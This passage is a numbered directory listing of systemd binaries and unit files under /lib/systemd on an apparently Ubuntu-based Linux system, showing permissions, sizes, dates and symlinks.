863. -rwxr-xr-x 1 root root 55K Mar 8 2018 systemd-sysctl
864. -rwxr-xr-x 1 root root 139K Mar 8 2018 systemd-timesyncd
865. -rwxr-xr-x 1 root root 35K Mar 8 2018 systemd-user-sessions
866. -rwxr-xr-x 1 root root 55K Mar 8 2018 systemd-activate
867. -rwxr-xr-x 1 root root 91K Mar 8 2018 systemd-backlight
868. -rwxr-xr-x 1 root root 276K Mar 8 2018 systemd-initctl
869. -rwxr-xr-x 1 root root 319K Mar 8 2018 systemd-journald
870. -rwxr-xr-x 1 root root 836K Mar 8 2018 systemd-networkd
871. -rwxr-xr-x 1 root root 35K Mar 8 2018 systemd-quotacheck
872. -rwxr-xr-x 1 root root 91K Mar 8 2018 systemd-rfkill
873. -rwxr-xr-x 1 root root 276K Mar 8 2018 systemd-update-utmp
874. -rwxr-xr-x 1 root root 1.3K Feb 21 2018 systemd-sysv-install
875.  
876. /lib/systemd/system:
877. total 1.1M
878. lrwxrwxrwx 1 root root 9 Jun 22 2018 screen-cleanup.service -> /dev/null
879. drwxr-xr-x 1 root root 42 Jun 22 2018 halt.target.wants
880. drwxr-xr-x 1 root root 100 Jun 22 2018 initrd-switch-root.target.wants
881. drwxr-xr-x 1 root root 44 Jun 22 2018 kexec.target.wants
882. drwxr-xr-x 1 root root 376 Jun 22 2018 multi-user.target.wants
883. drwxr-xr-x 1 root root 122 Jun 22 2018 poweroff.target.wants
884. drwxr-xr-x 1 root root 118 Jun 22 2018 reboot.target.wants
885. drwxr-xr-x 1 root root 1.4K Jun 22 2018 sysinit.target.wants
886. drwxr-xr-x 1 root root 342 Jun 22 2018 sockets.target.wants
887. drwxr-xr-x 1 root root 0 Jun 22 2018 busnames.target.wants
888. drwxr-xr-x 1 root root 40 Jun 22 2018 getty.target.wants
889. drwxr-xr-x 1 root root 72 Jun 22 2018 graphical.target.wants
890. drwxr-xr-x 1 root root 52 Jun 22 2018 local-fs.target.wants
891. drwxr-xr-x 1 root root 22 Jun 22 2018 rc-local.service.d
892. drwxr-xr-x 1 root root 72 Jun 22 2018 rescue.target.wants
893. drwxr-xr-x 1 root root 78 Jun 22 2018 resolvconf.service.wants
894. drwxr-xr-x 1 root root 66 Jun 22 2018 sigpwr.target.wants
895. drwxr-xr-x 1 root root 30 Jun 22 2018 systemd-resolved.service.d
896. drwxr-xr-x 1 root root 58 Jun 22 2018 systemd-timesyncd.service.d
897. drwxr-xr-x 1 root root 56 Jun 22 2018 timers.target.wants
898. -rw-r--r-- 1 root root 309 May 30 2018 pollinate.service
899. -rw-r--r-- 1 root root 246 May 24 2018 apport-forward.socket
900. -rw-r--r-- 1 root root 252 May 17 2018 snapd.autoimport.service
901. -rw-r--r-- 1 root root 320 May 17 2018 snapd.core-fixup.service
902. -rw-r--r-- 1 root root 237 May 17 2018 snapd.seeded.service
903. -rw-r--r-- 1 root root 308 May 17 2018 snapd.service
904. -rw-r--r-- 1 root root 287 May 17 2018 snapd.snap-repair.service
905. -rw-r--r-- 1 root root 281 May 17 2018 snapd.snap-repair.timer
906. -rw-r--r-- 1 root root 281 May 17 2018 snapd.socket
907. -rw-r--r-- 1 root root 474 May 17 2018 snapd.system-shutdown.service
908. lrwxrwxrwx 1 root root 27 May 9 2018 plymouth-log.service -> plymouth-read-write.service
909. lrwxrwxrwx 1 root root 21 May 9 2018 plymouth.service -> plymouth-quit.service
910. -rw-r--r-- 1 root root 412 May 9 2018 plymouth-halt.service
911. -rw-r--r-- 1 root root 426 May 9 2018 plymouth-kexec.service
912. -rw-r--r-- 1 root root 421 May 9 2018 plymouth-poweroff.service
913. -rw-r--r-- 1 root root 194 May 9 2018 plymouth-quit.service
914. -rw-r--r-- 1 root root 200 May 9 2018 plymouth-quit-wait.service
915. -rw-r--r-- 1 root root 244 May 9 2018 plymouth-read-write.service
916. -rw-r--r-- 1 root root 416 May 9 2018 plymouth-reboot.service
917. -rw-r--r-- 1 root root 532 May 9 2018 plymouth-start.service
918. -rw-r--r-- 1 root root 291 May 9 2018 plymouth-switch-root.service
919. -rw-r--r-- 1 root root 490 May 9 2018 systemd-ask-password-plymouth.path
920. -rw-r--r-- 1 root root 467 May 9 2018 systemd-ask-password-plymouth.service
921. -rw-r--r-- 1 root root 391 May 2 2018 cloud-config.service
922. -rw-r--r-- 1 root root 482 May 2 2018 cloud-final.service
923. -rw-r--r-- 1 root root 580 May 2 2018 cloud-init-local.service
924. -rw-r--r-- 1 root root 642 May 2 2018 cloud-init.service
925. -rw-r--r-- 1 root root 328 Apr 20 2018 open-vm-tools.service
926. -rw-r--r-- 1 root root 536 Apr 3 2018 cloud-config.target
927. -rw-r--r-- 1 root root 256 Apr 3 2018 cloud-init.target
928. -rw-r--r-- 1 root root 298 Mar 22 2018 vgauth.service
929. lrwxrwxrwx 1 root root 21 Mar 8 2018 udev.service -> systemd-udevd.service
930. lrwxrwxrwx 1 root root 14 Mar 8 2018 autovt@.service -> getty@.service
931. lrwxrwxrwx 1 root root 9 Mar 8 2018 bootlogd.service -> /dev/null
932. lrwxrwxrwx 1 root root 9 Mar 8 2018 bootlogs.service -> /dev/null
933. lrwxrwxrwx 1 root root 9 Mar 8 2018 bootmisc.service -> /dev/null
934. lrwxrwxrwx 1 root root 9 Mar 8 2018 checkfs.service -> /dev/null
935. lrwxrwxrwx 1 root root 9 Mar 8 2018 checkroot-bootclean.service -> /dev/null
936. lrwxrwxrwx 1 root root 9 Mar 8 2018 checkroot.service -> /dev/null
937. lrwxrwxrwx 1 root root 9 Mar 8 2018 cryptdisks-early.service -> /dev/null
938. lrwxrwxrwx 1 root root 9 Mar 8 2018 cryptdisks.service -> /dev/null
939. lrwxrwxrwx 1 root root 13 Mar 8 2018 ctrl-alt-del.target -> reboot.target
940. lrwxrwxrwx 1 root root 25 Mar 8 2018 dbus-org.freedesktop.hostname1.service -> systemd-hostnamed.service
941. lrwxrwxrwx 1 root root 23 Mar 8 2018 dbus-org.freedesktop.locale1.service -> systemd-localed.service
942. lrwxrwxrwx 1 root root 22 Mar 8 2018 dbus-org.freedesktop.login1.service -> systemd-logind.service
943. lrwxrwxrwx 1 root root 24 Mar 8 2018 dbus-org.freedesktop.network1.service -> systemd-networkd.service
944. lrwxrwxrwx 1 root root 24 Mar 8 2018 dbus-org.freedesktop.resolve1.service -> systemd-resolved.service
945. lrwxrwxrwx 1 root root 25 Mar 8 2018 dbus-org.freedesktop.timedate1.service -> systemd-timedated.service
946. lrwxrwxrwx 1 root root 16 Mar 8 2018 default.target -> graphical.target
947. lrwxrwxrwx 1 root root 9 Mar 8 2018 fuse.service -> /dev/null
948. lrwxrwxrwx 1 root root 9 Mar 8 2018 halt.service -> /dev/null
949. lrwxrwxrwx 1 root root 9 Mar 8 2018 hostname.service -> /dev/null
950. lrwxrwxrwx 1 root root 9 Mar 8 2018 hwclock.service -> /dev/null
951. lrwxrwxrwx 1 root root 9 Mar 8 2018 killprocs.service -> /dev/null
952. lrwxrwxrwx 1 root root 28 Mar 8 2018 kmod.service -> systemd-modules-load.service
953. lrwxrwxrwx 1 root root 28 Mar 8 2018 module-init-tools.service -> systemd-modules-load.service
954. lrwxrwxrwx 1 root root 9 Mar 8 2018 motd.service -> /dev/null
955. lrwxrwxrwx 1 root root 9 Mar 8 2018 mountall-bootclean.service -> /dev/null
956. lrwxrwxrwx 1 root root 9 Mar 8 2018 mountall.service -> /dev/null
957. lrwxrwxrwx 1 root root 9 Mar 8 2018 mountdevsubfs.service -> /dev/null
958. lrwxrwxrwx 1 root root 9 Mar 8 2018 mountkernfs.service -> /dev/null
959. lrwxrwxrwx 1 root root 9 Mar 8 2018 mountnfs-bootclean.service -> /dev/null
960. lrwxrwxrwx 1 root root 9 Mar 8 2018 mountnfs.service -> /dev/null
961. lrwxrwxrwx 1 root root 22 Mar 8 2018 procps.service -> systemd-sysctl.service
962. lrwxrwxrwx 1 root root 16 Mar 8 2018 rc.local.service -> rc-local.service
963. lrwxrwxrwx 1 root root 9 Mar 8 2018 rc.service -> /dev/null
964. lrwxrwxrwx 1 root root 9 Mar 8 2018 rcS.service -> /dev/null
965. lrwxrwxrwx 1 root root 9 Mar 8 2018 reboot.service -> /dev/null
966. lrwxrwxrwx 1 root root 9 Mar 8 2018 rmnologin.service -> /dev/null
967. lrwxrwxrwx 1 root root 15 Mar 8 2018 runlevel0.target -> poweroff.target
968. lrwxrwxrwx 1 root root 13 Mar 8 2018 runlevel1.target -> rescue.target
969. lrwxrwxrwx 1 root root 17 Mar 8 2018 runlevel2.target -> multi-user.target
970. lrwxrwxrwx 1 root root 17 Mar 8 2018 runlevel3.target -> multi-user.target
971. lrwxrwxrwx 1 root root 17 Mar 8 2018 runlevel4.target -> multi-user.target
972. lrwxrwxrwx 1 root root 16 Mar 8 2018 runlevel5.target -> graphical.target
973. lrwxrwxrwx 1 root root 13 Mar 8 2018 runlevel6.target -> reboot.target
974. lrwxrwxrwx 1 root root 9 Mar 8 2018 sendsigs.service -> /dev/null
975. lrwxrwxrwx 1 root root 9 Mar 8 2018 single.service -> /dev/null
976. lrwxrwxrwx 1 root root 9 Mar 8 2018 stop-bootlogd.service -> /dev/null
977. lrwxrwxrwx 1 root root 9 Mar 8 2018 stop-bootlogd-single.service -> /dev/null
978. lrwxrwxrwx 1 root root 9 Mar 8 2018 umountfs.service -> /dev/null
979. lrwxrwxrwx 1 root root 9 Mar 8 2018 umountnfs.service -> /dev/null
980. lrwxrwxrwx 1 root root 9 Mar 8 2018 umountroot.service -> /dev/null
981. lrwxrwxrwx 1 root root 27 Mar 8 2018 urandom.service -> systemd-random-seed.service
982. lrwxrwxrwx 1 root root 9 Mar 8 2018 x11-common.service -> /dev/null
983. -rw-r--r-- 1 root root 879 Mar 8 2018 basic.target
984. -rw-r--r-- 1 root root 379 Mar 8 2018 bluetooth.target
985. -rw-r--r-- 1 root root 358 Mar 8 2018 busnames.target
986. -rw-r--r-- 1 root root 770 Mar 8 2018 console-getty.service
987. -rw-r--r-- 1 root root 742 Mar 8 2018 console-shell.service
988. -rw-r--r-- 1 root root 791 Mar 8 2018 container-getty@.service
989. -rw-r--r-- 1 root root 394 Mar 8 2018 cryptsetup-pre.target
990. -rw-r--r-- 1 root root 366 Mar 8 2018 cryptsetup.target
991. -rw-r--r-- 1 root root 1010 Mar 8 2018 debug-shell.service
992. -rw-r--r-- 1 root root 670 Mar 8 2018 dev-hugepages.mount
993. -rw-r--r-- 1 root root 624 Mar 8 2018 dev-mqueue.mount
994. -rw-r--r-- 1 root root 1009 Mar 8 2018 emergency.service
995. -rw-r--r-- 1 root root 431 Mar 8 2018 emergency.target
996. -rw-r--r-- 1 root root 501 Mar 8 2018 exit.target
997. -rw-r--r-- 1 root root 440 Mar 8 2018 final.target
998. -rw-r--r-- 1 root root 1.5K Mar 8 2018 getty@.service
999. -rw-r--r-- 1 root root 460 Mar 8 2018 getty.target
1000. -rw-r--r-- 1 root root 558 Mar 8 2018 graphical.target
1001. -rw-r--r-- 1 root root 487 Mar 8 2018 halt.target
1002. -rw-r--r-- 1 root root 447 Mar 8 2018 hibernate.target
1003. -rw-r--r-- 1 root root 468 Mar 8 2018 hybrid-sleep.target
1004. -rw-r--r-- 1 root root 630 Mar 8 2018 initrd-cleanup.service
1005. -rw-r--r-- 1 root root 553 Mar 8 2018 initrd-fs.target
1006. -rw-r--r-- 1 root root 790 Mar 8 2018 initrd-parse-etc.service
1007. -rw-r--r-- 1 root root 526 Mar 8 2018 initrd-root-fs.target
1008. -rw-r--r-- 1 root root 640 Mar 8 2018 initrd-switch-root.service
1009. -rw-r--r-- 1 root root 691 Mar 8 2018 initrd-switch-root.target
1010. -rw-r--r-- 1 root root 671 Mar 8 2018 initrd.target
1011. -rw-r--r-- 1 root root 664 Mar 8 2018 initrd-udevadm-cleanup-db.service
1012. -rw-r--r-- 1 root root 501 Mar 8 2018 kexec.target
1013. -rw-r--r-- 1 root root 677 Mar 8 2018 kmod-static-nodes.service
1014. -rw-r--r-- 1 root root 395 Mar 8 2018 local-fs-pre.target
1015. -rw-r--r-- 1 root root 507 Mar 8 2018 local-fs.target
1016. -rw-r--r-- 1 root root 405 Mar 8 2018 machine.slice
1017. -rw-r--r-- 1 root root 473 Mar 8 2018 mail-transport-agent.target
1018. -rw-r--r-- 1 root root 492 Mar 8 2018 multi-user.target
1019. -rw-r--r-- 1 root root 464 Mar 8 2018 network-online.target
1020. -rw-r--r-- 1 root root 461 Mar 8 2018 network-pre.target
1021. -rw-r--r-- 1 root root 480 Mar 8 2018 network.target
1022. -rw-r--r-- 1 root root 514 Mar 8 2018 nss-lookup.target
1023. -rw-r--r-- 1 root root 473 Mar 8 2018 nss-user-lookup.target
1024. -rw-r--r-- 1 root root 354 Mar 8 2018 paths.target
1025. -rw-r--r-- 1 root root 552 Mar 8 2018 poweroff.target
1026. -rw-r--r-- 1 root root 377 Mar 8 2018 printer.target
1027. -rw-r--r-- 1 root root 693 Mar 8 2018 proc-sys-fs-binfmt_misc.automount
1028. -rw-r--r-- 1 root root 603 Mar 8 2018 proc-sys-fs-binfmt_misc.mount
1029. -rw-r--r-- 1 root root 568 Mar 8 2018 quotaon.service
1030. -rw-r--r-- 1 root root 612 Mar 8 2018 rc-local.service
1031. -rw-r--r-- 1 root root 543 Mar 8 2018 reboot.target
1032. -rw-r--r-- 1 root root 396 Mar 8 2018 remote-fs-pre.target
1033. -rw-r--r-- 1 root root 482 Mar 8 2018 remote-fs.target
1034. -rw-r--r-- 1 root root 978 Mar 8 2018 rescue.service
1035. -rw-r--r-- 1 root root 486 Mar 8 2018 rescue.target
1036. -rw-r--r-- 1 root root 500 Mar 8 2018 rpcbind.target
1037. -rw-r--r-- 1 root root 1.1K Mar 8 2018 serial-getty@.service
1038. -rw-r--r-- 1 root root 402 Mar 8 2018 shutdown.target
1039. -rw-r--r-- 1 root root 362 Mar 8 2018 sigpwr.target
1040. -rw-r--r-- 1 root root 420 Mar 8 2018 sleep.target
1041. -rw-r--r-- 1 root root 403 Mar 8 2018 -.slice
1042. -rw-r--r-- 1 root root 409 Mar 8 2018 slices.target
1043. -rw-r--r-- 1 root root 380 Mar 8 2018 smartcard.target
1044. -rw-r--r-- 1 root root 356 Mar 8 2018 sockets.target
1045. -rw-r--r-- 1 root root 380 Mar 8 2018 sound.target
1046. -rw-r--r-- 1 root root 441 Mar 8 2018 suspend.target
1047. -rw-r--r-- 1 root root 353 Mar 8 2018 swap.target
1048. -rw-r--r-- 1 root root 715 Mar 8 2018 sys-fs-fuse-connections.mount
1049. -rw-r--r-- 1 root root 518 Mar 8 2018 sysinit.target
1050. -rw-r--r-- 1 root root 719 Mar 8 2018 sys-kernel-config.mount
1051. -rw-r--r-- 1 root root 662 Mar 8 2018 sys-kernel-debug.mount
1052. -rw-r--r-- 1 root root 1.3K Mar 8 2018 syslog.socket
1053. -rw-r--r-- 1 root root 646 Mar 8 2018 systemd-ask-password-console.path
1054. -rw-r--r-- 1 root root 653 Mar 8 2018 systemd-ask-password-console.service
1055. -rw-r--r-- 1 root root 574 Mar 8 2018 systemd-ask-password-wall.path
1056. -rw-r--r-- 1 root root 681 Mar 8 2018 systemd-ask-password-wall.service
1057. -rw-r--r-- 1 root root 724 Mar 8 2018 systemd-backlight@.service
1058. -rw-r--r-- 1 root root 959 Mar 8 2018 systemd-binfmt.service
1059. -rw-r--r-- 1 root root 650 Mar 8 2018 systemd-bootchart.service
1060. -rw-r--r-- 1 root root 1.0K Mar 8 2018 systemd-bus-proxyd.service
1061. -rw-r--r-- 1 root root 409 Mar 8 2018 systemd-bus-proxyd.socket
1062. -rw-r--r-- 1 root root 497 Mar 8 2018 systemd-exit.service
1063. -rw-r--r-- 1 root root 551 Mar 8 2018 systemd-fsckd.service
1064. -rw-r--r-- 1 root root 540 Mar 8 2018 systemd-fsckd.socket
1065. -rw-r--r-- 1 root root 674 Mar 8 2018 systemd-fsck-root.service
1066. -rw-r--r-- 1 root root 648 Mar 8 2018 systemd-fsck@.service
1067. -rw-r--r-- 1 root root 544 Mar 8 2018 systemd-halt.service
1068. -rw-r--r-- 1 root root 631 Mar 8 2018 systemd-hibernate-resume@.service
1069. -rw-r--r-- 1 root root 501 Mar 8 2018 systemd-hibernate.service
1070. -rw-r--r-- 1 root root 710 Mar 8 2018 systemd-hostnamed.service
1071. -rw-r--r-- 1 root root 778 Mar 8 2018 systemd-hwdb-update.service
1072. -rw-r--r-- 1 root root 519 Mar 8 2018 systemd-hybrid-sleep.service
1073. -rw-r--r-- 1 root root 480 Mar 8 2018 systemd-initctl.service
1074. -rw-r--r-- 1 root root 524 Mar 8 2018 systemd-initctl.socket
1075. -rw-r--r-- 1 root root 607 Mar 8 2018 systemd-journald-audit.socket
1076. -rw-r--r-- 1 root root 1.1K Mar 8 2018 systemd-journald-dev-log.socket
1077. -rw-r--r-- 1 root root 1.3K Mar 8 2018 systemd-journald.service
1078. -rw-r--r-- 1 root root 842 Mar 8 2018 systemd-journald.socket
1079. -rw-r--r-- 1 root root 731 Mar 8 2018 systemd-journal-flush.service
1080. -rw-r--r-- 1 root root 557 Mar 8 2018 systemd-kexec.service
1081. -rw-r--r-- 1 root root 691 Mar 8 2018 systemd-localed.service
1082. -rw-r--r-- 1 root root 1.2K Mar 8 2018 systemd-logind.service
1083. -rw-r--r-- 1 root root 693 Mar 8 2018 systemd-machine-id-commit.service
1084. -rw-r--r-- 1 root root 967 Mar 8 2018 systemd-modules-load.service
1085. -rw-r--r-- 1 root root 1.3K Mar 8 2018 systemd-networkd.service
1086. -rw-r--r-- 1 root root 591 Mar 8 2018 systemd-networkd.socket
1087. -rw-r--r-- 1 root root 685 Mar 8 2018 systemd-networkd-wait-online.service
1088. -rw-r--r-- 1 root root 553 Mar 8 2018 systemd-poweroff.service
1089. -rw-r--r-- 1 root root 614 Mar 8 2018 systemd-quotacheck.service
1090. -rw-r--r-- 1 root root 717 Mar 8 2018 systemd-random-seed.service
1091. -rw-r--r-- 1 root root 548 Mar 8 2018 systemd-reboot.service
1092. -rw-r--r-- 1 root root 757 Mar 8 2018 systemd-remount-fs.service
1093. -rw-r--r-- 1 root root 907 Mar 8 2018 systemd-resolved.service
1094. -rw-r--r-- 1 root root 696 Mar 8 2018 systemd-rfkill.service
1095. -rw-r--r-- 1 root root 617 Mar 8 2018 systemd-rfkill.socket
1096. -rw-r--r-- 1 root root 497 Mar 8 2018 systemd-suspend.service
1097. -rw-r--r-- 1 root root 653 Mar 8 2018 systemd-sysctl.service
1098. -rw-r--r-- 1 root root 655 Mar 8 2018 systemd-timedated.service
1099. -rw-r--r-- 1 root root 1.1K Mar 8 2018 systemd-timesyncd.service
1100. -rw-r--r-- 1 root root 598 Mar 8 2018 systemd-tmpfiles-clean.service
1101. -rw-r--r-- 1 root root 450 Mar 8 2018 systemd-tmpfiles-clean.timer
1102. -rw-r--r-- 1 root root 703 Mar 8 2018 systemd-tmpfiles-setup-dev.service
1103. -rw-r--r-- 1 root root 683 Mar 8 2018 systemd-tmpfiles-setup.service
1104. -rw-r--r-- 1 root root 578 Mar 8 2018 systemd-udevd-control.socket
1105. -rw-r--r-- 1 root root 570 Mar 8 2018 systemd-udevd-kernel.socket
1106. -rw-r--r-- 1 root root 825 Mar 8 2018 systemd-udevd.service
1107. -rw-r--r-- 1 root root 823 Mar 8 2018 systemd-udev-settle.service
1108. -rw-r--r-- 1 root root 743 Mar 8 2018 systemd-udev-trigger.service
1109. -rw-r--r-- 1 root root 757 Mar 8 2018 systemd-update-utmp-runlevel.service
1110. -rw-r--r-- 1 root root 754 Mar 8 2018 systemd-update-utmp.service
1111. -rw-r--r-- 1 root root 573 Mar 8 2018 systemd-user-sessions.service
1112. -rw-r--r-- 1 root root 436 Mar 8 2018 system.slice
1113. -rw-r--r-- 1 root root 585 Mar 8 2018 system-update.target
1114. -rw-r--r-- 1 root root 405 Mar 8 2018 timers.target
1115. -rw-r--r-- 1 root root 395 Mar 8 2018 time-sync.target
1116. -rw-r--r-- 1 root root 417 Mar 8 2018 umount.target
1117. -rw-r--r-- 1 root root 528 Mar 8 2018 user@.service
1118. -rw-r--r-- 1 root root 392 Mar 8 2018 user.slice
1119. -rw-r--r-- 1 root root 225 Mar 6 2018 apt-daily.service
1120. -rw-r--r-- 1 root root 156 Mar 6 2018 apt-daily.timer
1121. -rw-r--r-- 1 root root 238 Mar 6 2018 apt-daily-upgrade.service
1122. -rw-r--r-- 1 root root 184 Mar 6 2018 apt-daily-upgrade.timer
1123. -rw-r--r-- 1 root root 342 Feb 21 2018 getty-static.service
1124. -rw-r--r-- 1 root root 153 Feb 21 2018 sigpwr-container-shutdown.service
1125. -rw-r--r-- 1 root root 175 Feb 21 2018 systemd-networkd-resolvconf-update.path
1126. -rw-r--r-- 1 root root 715 Feb 21 2018 systemd-networkd-resolvconf-update.service
1127. -rw-r--r-- 1 root root 683 Dec 7 2017 lxd.service
1128. -rw-r--r-- 1 root root 206 Dec 7 2017 lxd-bridge.service
1129. -rw-r--r-- 1 root root 318 Dec 7 2017 lxd-containers.service
1130. -rw-r--r-- 1 root root 197 Dec 7 2017 lxd.socket
1131. -rw-r--r-- 1 root root 189 Nov 30 2017 uuidd.service
1132. -rw-r--r-- 1 root root 126 Nov 30 2017 uuidd.socket
1133. -rw-r--r-- 1 root root 420 Nov 29 2017 resolvconf.service
1134. -rw-r--r-- 1 root root 311 Nov 9 2017 lxcfs.service
1135. -rw-r--r-- 1 root root 670 Nov 8 2017 mdadm-shutdown.service
1136. -rw-r--r-- 1 root root 345 Apr 20 2017 unattended-upgrades.service
1137. -rw-r--r-- 1 root root 385 Mar 16 2017 ssh.service
1138. -rw-r--r-- 1 root root 196 Mar 16 2017 ssh@.service
1139. -rw-r--r-- 1 root root 216 Mar 16 2017 ssh.socket
1140. -rw-r--r-- 1 root root 269 Jan 31 2017 setvtrgb.service
1141. -rw-r--r-- 1 root root 491 Jan 12 2017 dbus.service
1142. -rw-r--r-- 1 root root 106 Jan 12 2017 dbus.socket
1143. -rw-r--r-- 1 root root 735 Nov 30 2016 networking.service
1144. -rw-r--r-- 1 root root 497 Nov 30 2016 ifup@.service
1145. -rw-r--r-- 1 root root 631 Nov 3 2016 accounts-daemon.service
1146. -rw-r--r-- 1 root root 285 Jun 16 2016 keyboard-setup.service
1147. -rw-r--r-- 1 root root 288 Jun 16 2016 console-setup.service
1148. lrwxrwxrwx 1 root root 9 Apr 16 2016 lvm2.service -> /dev/null
1149. -rw-r--r-- 1 root root 334 Apr 16 2016 dm-event.service
1150. -rw-r--r-- 1 root root 248 Apr 16 2016 dm-event.socket
1151. -rw-r--r-- 1 root root 380 Apr 16 2016 lvm2-lvmetad.service
1152. -rw-r--r-- 1 root root 215 Apr 16 2016 lvm2-lvmetad.socket
1153. -rw-r--r-- 1 root root 335 Apr 16 2016 lvm2-lvmpolld.service
1154. -rw-r--r-- 1 root root 213 Apr 16 2016 lvm2-lvmpolld.socket
1155. -rw-r--r-- 1 root root 658 Apr 16 2016 lvm2-monitor.service
1156. -rw-r--r-- 1 root root 382 Apr 16 2016 lvm2-pvscan@.service
1157. drwxr-xr-x 1 root root 0 Apr 12 2016 runlevel1.target.wants
1158. drwxr-xr-x 1 root root 0 Apr 12 2016 runlevel2.target.wants
1159. drwxr-xr-x 1 root root 0 Apr 12 2016 runlevel3.target.wants
1160. drwxr-xr-x 1 root root 0 Apr 12 2016 runlevel4.target.wants
1161. drwxr-xr-x 1 root root 0 Apr 12 2016 runlevel5.target.wants
1162. -rw-r--r-- 1 root root 234 Apr 8 2016 acpid.service
1163. -rw-r--r-- 1 root root 251 Apr 5 2016 cron.service
1164. -rw-r--r-- 1 root root 290 Apr 5 2016 rsyslog.service
1165. -rw-r--r-- 1 root root 142 Mar 31 2016 apport-forward@.service
1166. -rw-r--r-- 1 root root 455 Mar 29 2016 iscsid.service
1167. -rw-r--r-- 1 root root 1.1K Mar 29 2016 open-iscsi.service
1168. -rw-r--r-- 1 root root 115 Feb 9 2016 acpid.socket
1169. -rw-r--r-- 1 root root 115 Feb 9 2016 acpid.path
1170. -rw-r--r-- 1 root root 169 Jan 14 2016 atd.service
1171. -rw-r--r-- 1 root root 182 Jan 14 2016 polkitd.service
1172. -rw-r--r-- 1 root root 790 Jun 1 2015 friendly-recovery.service
1173. -rw-r--r-- 1 root root 241 Mar 3 2015 ufw.service
1174. -rw-r--r-- 1 root root 250 Feb 24 2015 ureadahead-stop.service
1175. -rw-r--r-- 1 root root 242 Feb 24 2015 ureadahead-stop.timer
1176. -rw-r--r-- 1 root root 401 Feb 24 2015 ureadahead.service
1177. -rw-r--r-- 1 root root 188 Feb 24 2014 rsync.service
1178.  
1179. /lib/systemd/system/halt.target.wants:
1180. total 4.0K
1181. lrwxrwxrwx 1 root root 24 May 9 2018 plymouth-halt.service -> ../plymouth-halt.service
1182.  
1183. /lib/systemd/system/initrd-switch-root.target.wants:
1184. total 8.0K
1185. lrwxrwxrwx 1 root root 25 May 9 2018 plymouth-start.service -> ../plymouth-start.service
1186. lrwxrwxrwx 1 root root 31 May 9 2018 plymouth-switch-root.service -> ../plymouth-switch-root.service
1187.  
1188. /lib/systemd/system/kexec.target.wants:
1189. total 4.0K
1190. lrwxrwxrwx 1 root root 25 May 9 2018 plymouth-kexec.service -> ../plymouth-kexec.service
1191.  
1192. /lib/systemd/system/multi-user.target.wants:
1193. total 32K
1194. lrwxrwxrwx 1 root root 24 May 9 2018 plymouth-quit.service -> ../plymouth-quit.service
1195. lrwxrwxrwx 1 root root 29 May 9 2018 plymouth-quit-wait.service -> ../plymouth-quit-wait.service
1196. lrwxrwxrwx 1 root root 15 Mar 8 2018 getty.target -> ../getty.target
1197. lrwxrwxrwx 1 root root 33 Mar 8 2018 systemd-ask-password-wall.path -> ../systemd-ask-password-wall.path
1198. lrwxrwxrwx 1 root root 25 Mar 8 2018 systemd-logind.service -> ../systemd-logind.service
1199. lrwxrwxrwx 1 root root 39 Mar 8 2018 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
1200. lrwxrwxrwx 1 root root 32 Mar 8 2018 systemd-user-sessions.service -> ../systemd-user-sessions.service
1201. lrwxrwxrwx 1 root root 15 Jan 12 2017 dbus.service -> ../dbus.service
1202.  
1203. /lib/systemd/system/poweroff.target.wants:
1204. total 8.0K
1205. lrwxrwxrwx 1 root root 28 May 9 2018 plymouth-poweroff.service -> ../plymouth-poweroff.service
1206. lrwxrwxrwx 1 root root 39 Mar 8 2018 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
1207.  
1208. /lib/systemd/system/reboot.target.wants:
1209. total 8.0K
1210. lrwxrwxrwx 1 root root 26 May 9 2018 plymouth-reboot.service -> ../plymouth-reboot.service
1211. lrwxrwxrwx 1 root root 39 Mar 8 2018 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
1212.  
1213. /lib/systemd/system/sysinit.target.wants:
1214. total 108K
1215. lrwxrwxrwx 1 root root 30 May 9 2018 plymouth-read-write.service -> ../plymouth-read-write.service
1216. lrwxrwxrwx 1 root root 25 May 9 2018 plymouth-start.service -> ../plymouth-start.service
1217. lrwxrwxrwx 1 root root 30 Mar 8 2018 systemd-hwdb-update.service -> ../systemd-hwdb-update.service
1218. lrwxrwxrwx 1 root root 24 Mar 8 2018 systemd-udevd.service -> ../systemd-udevd.service
1219. lrwxrwxrwx 1 root root 31 Mar 8 2018 systemd-udev-trigger.service -> ../systemd-udev-trigger.service
1220. lrwxrwxrwx 1 root root 20 Mar 8 2018 cryptsetup.target -> ../cryptsetup.target
1221. lrwxrwxrwx 1 root root 22 Mar 8 2018 dev-hugepages.mount -> ../dev-hugepages.mount
1222. lrwxrwxrwx 1 root root 19 Mar 8 2018 dev-mqueue.mount -> ../dev-mqueue.mount
1223. lrwxrwxrwx 1 root root 28 Mar 8 2018 kmod-static-nodes.service -> ../kmod-static-nodes.service
1224. lrwxrwxrwx 1 root root 36 Mar 8 2018 proc-sys-fs-binfmt_misc.automount -> ../proc-sys-fs-binfmt_misc.automount
1225. lrwxrwxrwx 1 root root 32 Mar 8 2018 sys-fs-fuse-connections.mount -> ../sys-fs-fuse-connections.mount
1226. lrwxrwxrwx 1 root root 26 Mar 8 2018 sys-kernel-config.mount -> ../sys-kernel-config.mount
1227. lrwxrwxrwx 1 root root 25 Mar 8 2018 sys-kernel-debug.mount -> ../sys-kernel-debug.mount
1228. lrwxrwxrwx 1 root root 36 Mar 8 2018 systemd-ask-password-console.path -> ../systemd-ask-password-console.path
1229. lrwxrwxrwx 1 root root 25 Mar 8 2018 systemd-binfmt.service -> ../systemd-binfmt.service
1230. lrwxrwxrwx 1 root root 27 Mar 8 2018 systemd-journald.service -> ../systemd-journald.service
1231. lrwxrwxrwx 1 root root 32 Mar 8 2018 systemd-journal-flush.service -> ../systemd-journal-flush.service
1232. lrwxrwxrwx 1 root root 36 Mar 8 2018 systemd-machine-id-commit.service -> ../systemd-machine-id-commit.service
1233. lrwxrwxrwx 1 root root 31 Mar 8 2018 systemd-modules-load.service -> ../systemd-modules-load.service
1234. lrwxrwxrwx 1 root root 30 Mar 8 2018 systemd-random-seed.service -> ../systemd-random-seed.service
1235. lrwxrwxrwx 1 root root 25 Mar 8 2018 systemd-sysctl.service -> ../systemd-sysctl.service
1236. lrwxrwxrwx 1 root root 37 Mar 8 2018 systemd-tmpfiles-setup-dev.service -> ../systemd-tmpfiles-setup-dev.service
1237. lrwxrwxrwx 1 root root 33 Mar 8 2018 systemd-tmpfiles-setup.service -> ../systemd-tmpfiles-setup.service
1238. lrwxrwxrwx 1 root root 30 Mar 8 2018 systemd-update-utmp.service -> ../systemd-update-utmp.service
